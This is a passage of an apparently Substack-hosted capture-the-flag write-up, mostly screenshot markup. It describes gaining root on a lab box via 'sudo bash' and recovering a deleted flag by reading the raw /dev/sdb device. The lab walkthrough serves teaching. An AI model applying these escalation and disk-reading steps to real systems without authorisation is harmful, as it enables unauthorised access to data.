https://substackcdn.com/image/fetch/$s_!_8Sy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_8Sy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/f8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_8Sy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 424w, https://substackcdn.com/image/fetch/$s_!_8Sy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 848w, https://substackcdn.com/image/fetch/$s_!_8Sy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 1272w, https://substackcdn.com/image/fetch/$s_!_8Sy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8b348bf-8eea-4732-ae9a-5b66bb8f0486_800x295.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Now let&#8217;s see who we are and if we can sudo.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DhX_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DhX_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 424w, https://substackcdn.com/image/fetch/$s_!DhX_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 848w, https://substackcdn.com/image/fetch/$s_!DhX_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 1272w, https://substackcdn.com/image/fetch/$s_!DhX_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DhX_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/ea5692c1-480d-4371-940f-95e7b6b35816_800x130.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DhX_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 424w, https://substackcdn.com/image/fetch/$s_!DhX_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 848w, https://substackcdn.com/image/fetch/$s_!DhX_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 1272w, https://substackcdn.com/image/fetch/$s_!DhX_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fea5692c1-480d-4371-940f-95e7b6b35816_800x130.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Okay, we have sudo, so the path to root should be easy. Let&#8217;s get user first.</p><p>We&#8217;ll <em>cd ~</em> then move to Desktop (could also <em>cd ~/Desktop</em>).</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!55iT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!55iT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 424w, https://substackcdn.com/image/fetch/$s_!55iT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 848w, https://substackcdn.com/image/fetch/$s_!55iT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 1272w, https://substackcdn.com/image/fetch/$s_!55iT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!55iT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!55iT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 424w, https://substackcdn.com/image/fetch/$s_!55iT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 848w, https://substackcdn.com/image/fetch/$s_!55iT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 1272w, https://substackcdn.com/image/fetch/$s_!55iT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F065c7261-e545-444e-9e37-fb2e9dd7f465_800x871.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>There&#8217;s user! Now, let&#8217;s <em>sudo bash </em>then move to root.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AlyU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AlyU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 424w, https://substackcdn.com/image/fetch/$s_!AlyU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 848w, https://substackcdn.com/image/fetch/$s_!AlyU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 1272w, https://substackcdn.com/image/fetch/$s_!AlyU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AlyU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!AlyU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 424w, https://substackcdn.com/image/fetch/$s_!AlyU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 848w, https://substackcdn.com/image/fetch/$s_!AlyU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 1272w, https://substackcdn.com/image/fetch/$s_!AlyU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc6d20166-20ca-43c8-a2e3-127eaceccae0_800x303.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>That&#8217;s not a flag (in the correct format)! Let&#8217;s check the USB Stick. We can check 3 directories for mounted external drives: /<em>dev, /mnt/, </em>and <em>/media. </em>Let&#8217;s check /mnt first.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7JxH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7JxH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 424w, https://substackcdn.com/image/fetch/$s_!7JxH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 848w, https://substackcdn.com/image/fetch/$s_!7JxH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 1272w, https://substackcdn.com/image/fetch/$s_!7JxH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7JxH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7JxH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 424w, https://substackcdn.com/image/fetch/$s_!7JxH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 848w, https://substackcdn.com/image/fetch/$s_!7JxH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 1272w, https://substackcdn.com/image/fetch/$s_!7JxH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F383122f4-1e9c-4fb3-b5b9-00c6b083b07e_800x716.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nothing here, let&#8217;s check /dev. Quite a bit here. /dev/sdb is normally where a USB Stick may be. Let&#8217;s read this file</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fOQ1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fOQ1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 424w, https://substackcdn.com/image/fetch/$s_!fOQ1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 848w, https://substackcdn.com/image/fetch/$s_!fOQ1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 1272w, https://substackcdn.com/image/fetch/$s_!fOQ1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fOQ1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/caff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fOQ1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 424w, https://substackcdn.com/image/fetch/$s_!fOQ1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 848w, https://substackcdn.com/image/fetch/$s_!fOQ1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 1272w, https://substackcdn.com/image/fetch/$s_!fOQ1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fcaff1775-0413-4c9f-b763-fbd77b1f6ebf_800x208.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>It&#8217;s a mangled mess. Let&#8217;s note the /media/usbstick mention and scroll down.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!x2yi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!x2yi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 424w, https://substackcdn.com/image/fetch/$s_!x2yi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 848w, https://substackcdn.com/image/fetch/$s_!x2yi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 1272w, https://substackcdn.com/image/fetch/$s_!x2yi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!x2yi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/19dc4240-5af1-4826-890c-5685a85995eb_800x481.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!x2yi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 424w, https://substackcdn.com/image/fetch/$s_!x2yi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 848w, https://substackcdn.com/image/fetch/$s_!x2yi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 1272w, https://substackcdn.com/image/fetch/$s_!x2yi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F19dc4240-5af1-4826-890c-5685a85995eb_800x481.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>That&#8217;s dirty, but it looks like a flag.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TCZB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TCZB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 424w, https://substackcdn.com/image/fetch/$s_!TCZB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 848w, https://substackcdn.com/image/fetch/$s_!TCZB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9f11a7ce-9a6e-448e-87e8-39609a59973f_800x470.png 1272w, 